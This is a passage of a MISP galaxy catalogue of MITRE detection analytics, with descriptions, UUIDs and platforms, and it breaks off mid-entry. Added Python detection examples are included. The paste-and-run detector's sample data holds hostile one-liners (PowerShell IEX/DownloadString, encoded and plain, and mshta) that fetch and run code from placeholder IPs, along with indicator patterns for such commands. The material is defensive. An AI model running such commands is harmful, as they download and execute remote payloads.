UUID d203b007-e462-4842-82ce-c97f52c17e39 which can be used as unique global reference for Analytic 0527 - AN0527 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0527
mitre_platforms ['Identity Provider']

Analytic 0752 - AN0752

Remote login via ARD or SSH followed by screensharingd process activity or modification of TCC-protected files.

Internal MISP references

UUID e26778ca-0fd9-4a1b-9d1d-d8ba561b065a which can be used as unique global reference for Analytic 0752 - AN0752 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0752
mitre_platforms ['macOS']

Analytic 0285 - AN0285

Detects web-based credential phishing by analyzing traffic to suspicious URLs that mimic login portals and POST credential content.

Internal MISP references

UUID 6db136be-4e41-4cb7-8237-eee81ee6a3cd which can be used as unique global reference for Analytic 0285 - AN0285 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0285
mitre_platforms ['Network Devices']

Analytic 0825 - AN0825

Detects unauthorized edits to system configuration profiles, unexpected certificate trust changes, or abnormal ARP/DNS patterns indicative of interception.

Internal MISP references

UUID 7535f2e7-d7bb-4e92-8a63-36cd9ccc01be which can be used as unique global reference for Analytic 0825 - AN0825 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0825
mitre_platforms ['macOS']

Analytic 0258 - AN0258

Detects creation or modification of scheduled tasks using schtasks.exe, at.exe, or COM objects followed by execution of outlier processes tied to the scheduled job.

Internal MISP references

UUID a0714b4d-5dbf-499e-a737-7b00478267ee which can be used as unique global reference for Analytic 0258 - AN0258 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0258
mitre_platforms ['Windows']

Analytic 0528 - AN0528

Application access tokens used to call APIs (e.g., Google Workspace, Salesforce) without interactive logins, often with unusual scopes or elevated permissions.

Internal MISP references

UUID dfad1a86-de44-40b2-95b5-9b18c4103cbb which can be used as unique global reference for Analytic 0528 - AN0528 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0528
mitre_platforms ['SaaS']

Analytic 0852 - AN0852

Application crash or repeated restart cycle triggered by malformed input or exploit file, observed via unified logs and process crash monitoring.

Internal MISP references

UUID e6b92e19-5bc8-414b-b200-96ed6d286388 which can be used as unique global reference for Analytic 0852 - AN0852 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0852
mitre_platforms ['macOS']

Analytic 0582 - AN0582

Detects abuse of container orchestration platforms (e.g., Kubernetes) where adversaries create CronJobs to maintain persistence or execute malicious Jobs across the cluster.

Internal MISP references

UUID f2c03ef0-cd36-42b8-9c2d-e25a3b1b8b1c which can be used as unique global reference for Analytic 0582 - AN0582 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0582
mitre_platforms ['Containers']

Analytic 0295 - AN0295

Sudden valid logins from accounts whose credentials were previously dumped but that had not authenticated successfully before, correlated with the timeline of suspected offline hash cracking.

Internal MISP references

UUID 0084089f-6e5f-42c4-8b0d-78e95cd55d0f which can be used as unique global reference for Analytic 0295 - AN0295 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0295
mitre_platforms ['Identity Provider']

Analytic 0925 - AN0925

ESXi shell or guest VM tools initiate external connections via scripted traffic forwarding to Internet-based proxies. Detected by firewall or shell audit logs showing outbound connection spikes from hypervisor or guest VM to remote proxy nodes.

Internal MISP references

UUID 0c8a9540-51d7-4ba3-8594-8860b3fa8485 which can be used as unique global reference for Analytic 0925 - AN0925 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0925
mitre_platforms ['ESXi']

Analytic 0259 - AN0259

Detects creation or modification of cron jobs via crontab, /etc/cron.* directories, or systemd timer units with execution by unusual users or non-standard intervals.

Internal MISP references

UUID 3374a404-06f9-4b32-bf94-5ac688fb9dad which can be used as unique global reference for Analytic 0259 - AN0259 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0259
mitre_platforms ['Linux']

Analytic 0592 - AN0592

Domain logins using network accounts or mobile accounts via Open Directory or Active Directory plugins, especially outside business hours or on atypical endpoints.

Internal MISP references

UUID 96050801-dc36-462f-982e-df2806eaa3ea which can be used as unique global reference for Analytic 0592 - AN0592 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0592
mitre_platforms ['macOS']

Analytic 0529 - AN0529

OAuth token usage for Exchange Online or SharePoint API access without preceding login or from unauthorized clients.

Internal MISP references

UUID 9680d434-3470-4a35-bf48-1785ab14d831 which can be used as unique global reference for Analytic 0529 - AN0529 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0529
mitre_platforms ['Office Suite']

Analytic 0952 - AN0952

Detects unauthorized modification of host binaries, modules, or services within ESXi. Correlates tampered files with subsequent unexpected service behavior or malicious module load attempts.

Internal MISP references

UUID fa36a169-1cca-4887-b362-e3cceb02414f which can be used as unique global reference for Analytic 0952 - AN0952 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0952
mitre_platforms ['ESXi']

Analytic 0266 - AN0266

Use of native tools or scripting (e.g., usermod, passwd, groupmod) to escalate permissions or persist access on existing users, correlated with login or process events.

Internal MISP references

UUID 0eb6cf59-4ba8-4cea-b64a-686ce7c69f70 which can be used as unique global reference for Analytic 0266 - AN0266 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0266
mitre_platforms ['Linux']

Analytic 0626 - AN0626

Detects cloud-native software deployment or management (e.g., SSM Run Command, Intune) initiating script execution on endpoints outside expected org IDs, admin groups, or maintenance windows.

Internal MISP references

UUID 2e6218d1-1f84-4dc5-8ab5-c24835aafbab which can be used as unique global reference for Analytic 0626 - AN0626 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0626
mitre_platforms ['SaaS']

Analytic 0662 - AN0662

Adversary modifies website or application-hosted content via unauthorized file changes or script injections, often by exploiting web servers or CMS access.

Internal MISP references

UUID d02dbf1d-b6e9-4c3c-84a2-f70fec797504 which can be used as unique global reference for Analytic 0662 - AN0662 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0662
mitre_platforms ['Windows']

Analytic 0726 - AN0726

Detects staged data aggregated in /Users/Shared, /private/tmp with compression tools like ditto or zip, initiated via Terminal or AppleScript.

Internal MISP references

UUID 01a3cc24-df78-4ff7-8a25-67545d830229 which can be used as unique global reference for Analytic 0726 - AN0726 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0726
mitre_platforms ['macOS']

Analytic 0672 - AN0672

Monitor for file access to certificate directories, commands invoking OpenSSL or PKCS#12 utilities to export or modify certificates, and processes accessing sensitive key storage paths.

Internal MISP references

UUID 27cbe2a7-25a0-4f6d-b2b0-dff50b2c0883 which can be used as unique global reference for Analytic 0672 - AN0672 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0672
mitre_platforms ['Linux']

Analytic 0267 - AN0267

Modifications to user accounts via dscl, pwpolicy, or sysadminctl that alter group membership, enable the root account, or bypass MDM restrictions.

Internal MISP references

UUID 616ccbf4-08f2-4b54-8e41-a8e362e31827 which can be used as unique global reference for Analytic 0267 - AN0267 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0267
mitre_platforms ['macOS']

Analytic 0627 - AN0627

Detects central router or switch config management tools (e.g., FortiManager, Cisco Prime) triggering device reboots or config pushes using abnormal accounts or IPs.

Internal MISP references

UUID 82acd5d4-70e1-4f3e-b059-15bdc55cf4bf which can be used as unique global reference for Analytic 0627 - AN0627 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0627
mitre_platforms ['Network Devices']

Analytic 0762 - AN0762

VMware management daemons or guest processes initiating encrypted connections outside expected vCenter, update servers, or internal comms. Defender identifies hostd or vpxa initiating outbound TLS flows with uncommon destinations.

Internal MISP references

UUID b94bb114-7532-4934-9955-9c7031109b9e which can be used as unique global reference for Analytic 0762 - AN0762 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0762
mitre_platforms ['ESXi']

Analytic 0276 - AN0276

Unauthorized firmware uploads to routers, switches, or firewalls via TFTP/FTP/SCP. Logs showing boot variable or startup image path changes redirecting to non-standard firmware images. Abnormal reboots or firmware rollback attempts following configuration modification events.

Internal MISP references

UUID ceb2c722-f9ec-41de-980e-d8848b1cb20c which can be used as unique global reference for Analytic 0276 - AN0276 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0276
mitre_platforms ['Network Devices']

Analytic 0268 - AN0268

Modifications to SSO/SAML user attributes (e.g., isAdmin, role, MFA bypass, App assignments) often through CLI, API, or rogue IdP apps.

Internal MISP references

UUID 5c69f3b9-8f73-455e-8eb1-5281cd6ce6d5 which can be used as unique global reference for Analytic 0268 - AN0268 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0268
mitre_platforms ['Identity Provider']

Analytic 0286 - AN0286

Detects network share disconnection attempts using command-line tools like net use /delete, PowerShell Remove-SmbMapping, and correlation with process lineage and SMB session teardown activity.

Internal MISP references

UUID 5d47e6b2-04fb-45ab-be98-7de1baabf508 which can be used as unique global reference for Analytic 0286 - AN0286 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0286
mitre_platforms ['Windows']

Analytic 0682 - AN0682

Detection of persistent login hooks configured via defaults or plist modifications that result in execution of scripts or binaries at user login, breaking expected parent-child process lineage.

Internal MISP references

UUID 7a424183-94ca-4dc1-a03b-610d174aa973 which can be used as unique global reference for Analytic 0682 - AN0682 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0682
mitre_platforms ['macOS']

Analytic 0628 - AN0628

Detects anomalous use of COM objects for execution, such as Office applications spawning scripting engines, enumeration of COM interfaces via registry queries, or processes loading atypical DLLs through COM activation. Correlates process creation, module loads, and registry queries to flag suspicious COM-based code execution or persistence.

Internal MISP references

UUID 8a7a7e80-c28e-42b2-a222-c1d75932c986 which can be used as unique global reference for Analytic 0628 - AN0628 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0628
mitre_platforms ['Windows']

Analytic 0826 - AN0826

Detects unauthorized firmware or configuration changes enabling adversary-in-the-middle positioning (e.g., route injection, DNS spoofing, SSL downgrade). Behavioral analytics focus on sudden changes to routing tables or image file integrity failures.

Internal MISP references

UUID bb3daf14-f237-4688-a319-a4d7570e407e which can be used as unique global reference for Analytic 0826 - AN0826 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0826
mitre_platforms ['Network Devices']

Analytic 0862 - AN0862

Adversary ships a tampered application or update: an updater/installer (msiexec/setup/update.exe/vendor service) writes or replaces binaries; on first run it spawns scripts/shells or unsigned DLLs and beacons to non-approved update CDNs/hosts. Detection correlates: (1) process creation of installer/updater → (2) file metadata changes in program paths → (3) first-run children and module/signature anomalies → (4) outbound connections to unexpected hosts within a short window.

Internal MISP references

UUID e3ddaba3-282b-4bd0-b316-78b724b79acd which can be used as unique global reference for Analytic 0862 - AN0862 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0862
mitre_platforms ['Windows']

Analytic 0296 - AN0296

Offline cracking inferred from subsequent successful CLI or web-based authentications to routers or switches using previously dumped accounts.

Internal MISP references

UUID 029db14d-fb94-49ee-9d6d-3c7212671377 which can be used as unique global reference for Analytic 0296 - AN0296 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0296
mitre_platforms ['Network Devices']
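The dump-then-first-login correlation that AN0295 and AN0296 describe, as an added example (not code from the MITRE analytics or the MISP galaxy): for each account known to have had its secret dumped, it finds the first successful authentication after the dump and flags it when the account was dormant beforehand or the login comes from a source never seen for that account, reporting the delay (the cracking window) and the failures that preceded success. The dump timestamps, authentication records and the 30-day dormancy window are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed data. DUMP_EVENTS: when each account's secret was observed being
# dumped (e.g. from an earlier credential-access alert). AUTH_EVENTS: the
# authentication log of the device or identity provider.
DUMP_EVENTS = [
    {"account": "svc_backup", "ts": "2024-05-01T02:10:00"},
    {"account": "jdoe", "ts": "2024-05-01T02:10:00"},
    {"account": "admin_old", "ts": "2024-05-01T02:10:00"},
]
AUTH_EVENTS = [
    {"account": "jdoe", "ts": "2024-04-29T09:00:00", "result": "success", "src": "wks-12"},
    {"account": "jdoe", "ts": "2024-05-02T09:05:00", "result": "success", "src": "wks-12"},
    {"account": "svc_backup", "ts": "2024-05-03T23:41:00", "result": "success", "src": "10.0.9.77"},
    {"account": "admin_old", "ts": "2024-05-02T01:00:00", "result": "failure", "src": "10.0.9.77"},
    {"account": "admin_old", "ts": "2024-05-02T01:00:30", "result": "failure", "src": "10.0.9.77"},
    {"account": "admin_old", "ts": "2024-05-04T03:15:00", "result": "success", "src": "10.0.9.77"},
]


def correlate_cracked_logins(dump_events, auth_events, dormant_days=30):
    """For each dumped account, find the first successful login after the dump and
    flag it when the account was dormant before the dump or the login comes from
    a source never seen for that account."""
    by_account = defaultdict(list)
    for ev in auth_events:
        by_account[ev["account"]].append(dict(ev, dt=datetime.fromisoformat(ev["ts"])))
    alerts = []
    for dump in dump_events:
        account, dump_dt = dump["account"], datetime.fromisoformat(dump["ts"])
        history = sorted(by_account.get(account, []), key=lambda e: e["dt"])
        prior_success = [e for e in history if e["result"] == "success" and e["dt"] < dump_dt]
        dormant = not any(e["dt"] >= dump_dt - timedelta(days=dormant_days) for e in prior_success)
        after = [e for e in history if e["dt"] >= dump_dt]
        first_success = next((e for e in after if e["result"] == "success"), None)
        if first_success is None:
            continue   # nothing to correlate yet; re-run as the log grows
        failures = sum(1 for e in after if e["result"] == "failure" and e["dt"] < first_success["dt"])
        new_source = first_success["src"] not in {e["src"] for e in prior_success}
        if dormant or new_source:
            alerts.append({
                "account": account, "dormant": dormant, "new_source": new_source,
                "src": first_success["src"], "failures_before_success": failures,
                "hours_after_dump": round((first_success["dt"] - dump_dt).total_seconds() / 3600, 1),
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate_cracked_logins(DUMP_EVENTS, AUTH_EVENTS):
        print(alert)
```

In the sample, `jdoe` logs in after the dump but from a known workstation with recent prior activity, so it is not reported; the two service/admin accounts with no recent history are. The delay between dump and first login is what the analytic calls the cracking timeline: a short delay points at a weak password or a pass-the-hash path rather than cracking, a long one at offline cracking, and neither is benign for a dormant account.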

Analytic 0629 - AN0629

Unauthorized creation or modification of DLLs loaded by LSASS, abnormal registry values under LSA extensions, and anomalous DLL load activity into the lsass.exe process context—correlated during boot or logon events.

Internal MISP references

UUID 5028303d-22d6-490c-b053-015e877d5829 which can be used as unique global reference for Analytic 0629 - AN0629 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0629
mitre_platforms ['Windows']

Analytic 0269 - AN0269

Addition of new users or changes to role permissions (e.g., ReadOnly -> Admin) via API or vSphere Client, particularly from non-jumpbox IPs.

Internal MISP references

UUID 74565d24-df58-49b6-86e0-01a03d6dc2a7 which can be used as unique global reference for Analytic 0269 - AN0269 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0269
mitre_platforms ['ESXi']

Analytic 0692 - AN0692

IaaS (cloud images/VMs): A new VM/instance is launched from a non-approved or newly-seen image (AMI/GCP Image/Azure Image). On first boot, cloud-init/user-data or embedded agents download code, spawn system utilities, or open outbound C2/mining traffic. The analytic correlates Instance/Image Creation → Instance Start → in-guest Process/Command Execution and/or anomalous network traffic.

Internal MISP references

UUID 7b711402-12f7-4985-93df-2693eaf9ebdb which can be used as unique global reference for Analytic 0692 - AN0692 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0692
mitre_platforms ['Windows']

Analytic 0962 - AN0962

A user is socially engineered (web page, email, document) to open Run/PowerShell/CMD and paste an obfuscated one-liner. The chain is: (1) user context active in a browser/email/office app → (2) process creation of a command interpreter with suspicious arguments (base64/Invoke-Expression/web download/pipeline to shell) → (3) optional file drop in %TEMP% or %APPDATA% → (4) outbound network connection to an external domain. Events are correlated within a short window and with consistent user/session.

Internal MISP references

UUID 8cb0a7da-942b-4771-b9d5-cf558755677a which can be used as unique global reference for Analytic 0962 - AN0962 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0962
mitre_platforms ['Windows']
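The chain AN0962 describes, as an added example (not code from the MITRE analytic or the MISP galaxy): it scores command interpreters on paste-and-run indicators (decoding `-EncodedCommand` payloads so that `IEX`/download cues hidden in the Base64 count too) and only alerts when the same user had a browser, mail or office process start shortly before. The process records, the indicator patterns, the application lists and the 300-second window are constructed assumptions.

```python
import base64
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
USER_APPS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe", "winword.exe", "excel.exe"}
# Indicator patterns scored over the raw command line plus any decoded -EncodedCommand.
INDICATORS = {
    "encoded_command": r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}",
    "invoke_expression": r"(?i)\b(iex|invoke-expression)\b",
    "web_download": r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin|\bmshta\b)",
    "url": r"(?i)https?://",
    "hidden_or_noprofile": r"(?i)-(w|windowstyle)\s+hidden|-nop\b|-noprofile\b",
    "pipe_to_shell": r"\|\s*(cmd|powershell|pwsh|bash|sh)\b",
}

# Constructed process-creation records (ts in seconds, one host); not real telemetry.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"ts": 100, "user": "alice", "parent": "explorer.exe", "image": "chrome.exe", "cmdline": "chrome.exe"},
    {"ts": 160, "user": "alice", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc " + ENCODED},          # pasted into Win+R
    {"ts": 200, "user": "bob", "parent": "code.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File build.ps1"},  # developer, benign
    {"ts": 290, "user": "carol", "parent": "explorer.exe", "image": "winword.exe", "cmdline": "winword.exe"},
    {"ts": 300, "user": "carol", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c mshta http://203.0.113.7/r.hta"},
    {"ts": 400, "user": "dave", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "iex (iwr http://203.0.113.9/p)"'},  # no user app active
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None."""
    match = re.search(INDICATORS["encoded_command"], cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(0).split()[-1]).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_cmdline(cmdline):
    """Indicator names hit by the command line and its decoded payload, plus the payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = [name for name, pattern in INDICATORS.items() if re.search(pattern, text)]
    return hits, decoded


def detect_paste_and_run(events, window_s=300, min_hits=2):
    """Interpreter launches with >= min_hits indicators, by a user who had a
    browser/mail/office process start within window_s beforehand."""
    alerts = []
    for ev in events:
        if ev["image"].lower() not in INTERPRETERS:
            continue
        hits, decoded = score_cmdline(ev["cmdline"])
        if len(hits) < min_hits:
            continue
        recent_apps = sorted({e["image"] for e in events
                              if e["user"] == ev["user"] and e["image"].lower() in USER_APPS
                              and 0 <= ev["ts"] - e["ts"] <= window_s})
        if not recent_apps:
            continue   # same indicators from a scheduled job or admin shell: different analytic
        alerts.append({"ts": ev["ts"], "user": ev["user"], "image": ev["image"],
                       "indicators": hits, "decoded": decoded, "recent_user_apps": recent_apps})
    return alerts


if __name__ == "__main__":
    for alert in detect_paste_and_run(SAMPLE_EVENTS):
        print(alert)
```

The parent of the pasted interpreter is usually `explorer.exe` (Win+R) rather than the browser, which is why the example correlates on user and time instead of on process lineage. The `dave` record carries four indicators but no preceding user-application activity and is deliberately left for a separate rule, keeping this one tied to the social-engineering chain.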

Analytic 0926 - AN0926

Changes to NAT/firewall policies enabling outbound port forwarding from internal IPs to Internet-based proxy endpoints. Log spikes in outbound flows to CDN, VPS, or anomalous ASNs with few return packets.

Internal MISP references

UUID bca44b88-4615-45b8-8fb9-ce934c65c8be which can be used as unique global reference for Analytic 0926 - AN0926 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0926
mitre_platforms ['Network Devices']

Analytic 0727 - AN0727

Detects local staging behavior via snapshot creation or files written into VMFS partitions by scripts or unauthorized shell access.

Internal MISP references

UUID 27caeb90-1cf0-4650-a3f3-c8a1edaecbab which can be used as unique global reference for Analytic 0727 - AN0727 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0727
mitre_platforms ['ESXi']

Analytic 0772 - AN0772

Behavioral chain of a user being granted elevated privileges or roles in Entra ID or Okta following suspicious login or account creation activity.

Internal MISP references

UUID a52321d0-5961-497b-8212-61602e05420b which can be used as unique global reference for Analytic 0772 - AN0772 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0772
mitre_platforms ['Identity Provider']

Analytic 0277 - AN0277

Detects malicious injection behavior involving memory allocation, remote thread queuing via APC (e.g., QueueUserAPC), and altered thread context within another live process to execute unauthorized code under legitimate context.

Internal MISP references

UUID f0fce510-b195-4688-a4ac-b78584febd08 which can be used as unique global reference for Analytic 0277 - AN0277 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0277
mitre_platforms ['Windows']

Analytic 0872 - AN0872

Detection of browser- or email-client-driven file creation (often in temp directories) following navigation to, or execution of, HTML files that use JavaScript Blob APIs or base64 data URLs, with follow-on execution of the dropped payload. Sysmon Event ID 15 (FileCreateStreamHash) exposes the Zone.Identifier alternate data stream, whose HostUrl/ReferrerUrl values indicate local assembly (e.g., HostUrl=about:internet). Optional: absence of a correspondingly large HTTP download record for the same URL and client in proxy logs, which also suggests the file was assembled locally.

Internal MISP references

UUID 0cb02d2e-dcea-4195-80e7-81ec29b4d546 which can be used as unique global reference for Analytic 0872 - AN0872 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0872
mitre_platforms ['Windows']

Analytic 0782 - AN0782

Monitors for compression tool usage (e.g., 7zip, WinRAR, MakeCab) that follows or precedes file modification, suspicious file types (e.g., .exe, .dll) being compressed, or dropped from self-extracting archives followed by immediate execution.

Internal MISP references

UUID 18253101-bce9-453e-ab03-603bbd174552 which can be used as unique global reference for Analytic 0782 - AN0782 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0782
mitre_platforms ['Windows']

Analytic 0827 - AN0827

Processes attempting raw disk access to overwrite sensitive structures such as the MBR or partition table using \\.\PhysicalDrive notation. Detection relies on correlating process creation, privilege escalation, and raw sector writes in Sysmon and Security logs.

Internal MISP references

UUID 34560ac3-2e05-4394-8145-0cd6071c1680 which can be used as unique global reference for Analytic 0827 - AN0827 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0827
mitre_platforms ['Windows']

Analytic 0287 - AN0287

Detects modification of LSASS and authentication DLLs, suspicious registry changes to password filter packages, and abnormal process access to lsass.exe. Correlates registry modifications, DLL loads, and process handle access events.

Internal MISP references

UUID 818b46ce-9c93-47c9-a649-8bc5d3b734a5 which can be used as unique global reference for Analytic 0287 - AN0287 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0287
mitre_platforms ['Windows']

Analytic 0278 - AN0278

Detects execution of Lua interpreters or scripts (.lua), especially when correlated with suspicious parent processes or file drop events, indicating malicious use of embedded scripting.

Internal MISP references

UUID b3ea7945-a7ef-421c-be84-af86b2b95ae5 which can be used as unique global reference for Analytic 0278 - AN0278 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0278
mitre_platforms ['Windows']

Analytic 0728 - AN0728

Monitor DNS query results where subsequent connections use derived or unusual port numbers not explicitly resolved, especially when tied to suspicious processes. Correlate Sysmon DNS logs (Event ID 22) with process creation and socket activity.

Internal MISP references

UUID f47f256d-686f-4553-85e2-bd4d156da1e7 which can be used as unique global reference for Analytic 0728 - AN0728 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0728
mitre_platforms ['Windows']

Analytic 0972 - AN0972

VM or cloud instance generating anomalously high network egress targeting same destination IP or service, especially using stateless protocols.

Internal MISP references

UUID 408b2724-079c-4636-9764-52f435726de7 which can be used as unique global reference for Analytic 0972 - AN0972 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0972
mitre_platforms ['IaaS']

Analytic 0729 - AN0729

Inspect resolver and audit logs for processes initiating outbound connections to ports calculated from DNS response IPs. Abnormal ephemeral port usage shortly after DNS queries can indicate DNS calculation behavior.

Internal MISP references

UUID 98f5c157-17c8-4ab8-943d-8d4c54dc3d6d which can be used as unique global reference for Analytic 0729 - AN0729 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0729
mitre_platforms ['Linux']
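The correlation that AN0728 and AN0729 describe, as an added example (not code from the MITRE analytics or the MISP galaxy): for each outbound connection on a non-baseline port, it looks back for DNS answers returned to the same process and tests whether the destination port equals a value derived from the answer's octets. Real families each use their own formula, so the derivations here are illustrative assumptions, as are the event records, the common-port baseline and the 60-second window.

```python
# Candidate port derivations: illustrative assumptions covering the common
# "arithmetic on the octets" idea, not any specific family's formula.
DERIVATIONS = {
    "sum_of_octets": lambda o: o[0] + o[1] + o[2] + o[3],
    "sum_of_first_three": lambda o: o[0] + o[1] + o[2],
    "high_16_bits": lambda o: (o[0] << 8) | o[1],
    "low_16_bits": lambda o: (o[2] << 8) | o[3],
    "last_two_octets_summed_x4": lambda o: (o[2] + o[3]) * 4,
}
COMMON_PORTS = {22, 25, 53, 80, 110, 123, 143, 389, 443, 445, 587, 636, 993, 995, 3389, 8080, 8443}

# Constructed DNS query results (Sysmon Event ID 22 style) and network connections
# (Event ID 3 style), keyed by pid; not real telemetry.
SAMPLE_DNS = [
    {"ts": 10, "pid": 4242, "image": "agent.exe", "query": "cdn-update.example", "answers": ["10.20.30.40"]},
    {"ts": 20, "pid": 1500, "image": "chrome.exe", "query": "www.example", "answers": ["93.184.216.34"]},
    {"ts": 30, "pid": 9001, "image": "svc.exe", "query": "t1.example", "answers": ["1.2.3.4"]},
    {"ts": 40, "pid": 9002, "image": "app.exe", "query": "t2.example", "answers": ["8.8.8.8"]},
]
SAMPLE_CONNS = [
    {"ts": 12, "pid": 4242, "dst_ip": "203.0.113.50", "dst_port": 100},   # 10+20+30+40
    {"ts": 13, "pid": 4242, "dst_ip": "203.0.113.50", "dst_port": 443},
    {"ts": 21, "pid": 1500, "dst_ip": "93.184.216.34", "dst_port": 443},
    {"ts": 31, "pid": 9001, "dst_ip": "198.51.100.7", "dst_port": 772},   # 3*256+4
    {"ts": 200, "pid": 9002, "dst_ip": "198.51.100.8", "dst_port": 32},   # 8*4, but 160 s later
]


def candidate_ports(ip):
    """Every port the derivations would produce from one IPv4 answer."""
    octets = [int(x) for x in ip.split(".")]
    return {name: fn(octets) for name, fn in DERIVATIONS.items()}


def correlate_dns_calculation(dns_events, conn_events, window_s=60):
    """Connections whose destination port is derivable from a DNS answer the same
    process received within window_s; baseline ports are ignored."""
    alerts = []
    for conn in conn_events:
        if conn["dst_port"] in COMMON_PORTS:
            continue
        for dns in dns_events:
            if dns["pid"] != conn["pid"] or not 0 <= conn["ts"] - dns["ts"] <= window_s:
                continue
            for ip in dns["answers"]:
                for name, port in candidate_ports(ip).items():
                    if port == conn["dst_port"]:
                        alerts.append({"pid": conn["pid"], "image": dns["image"], "query": dns["query"],
                                       "answer": ip, "derivation": name,
                                       "dst": "%s:%d" % (conn["dst_ip"], conn["dst_port"]),
                                       "delay_s": conn["ts"] - dns["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in correlate_dns_calculation(SAMPLE_DNS, SAMPLE_CONNS):
        print(alert)
```

Note that the connection destination is not required to be the resolved IP: in DNS calculation the answer is often a dummy that only carries the port, and the real C2 address comes from elsewhere. Small derived values (sums of octets are at most 1020) collide with legitimate low ports often enough that a single match is weak evidence; treat repeated matches for one process and one derivation as the signal.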

Analytic 0927 - AN0927

A process/script constructs or references a custom/alphabet translation table (e.g., 64/85/32+ arbitrary chars, XOR/base-N loops) or emits long high-entropy strings that do NOT validate as standard Base64/Hex → shortly after, the same process (or its child) generates outbound traffic with asymmetric bytes_out:bytes_in, fixed-size beacons, or protocol/header mismatches (e.g., Content-Type says JSON but body fails JSON parse / contains non-standard alphabet).

Internal MISP references

UUID b8dea721-8e0d-4bcd-bde4-6609afd595e5 which can be used as unique global reference for Analytic 0927 - AN0927 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0927
mitre_platforms ['Windows']

Analytic 0297 - AN0297

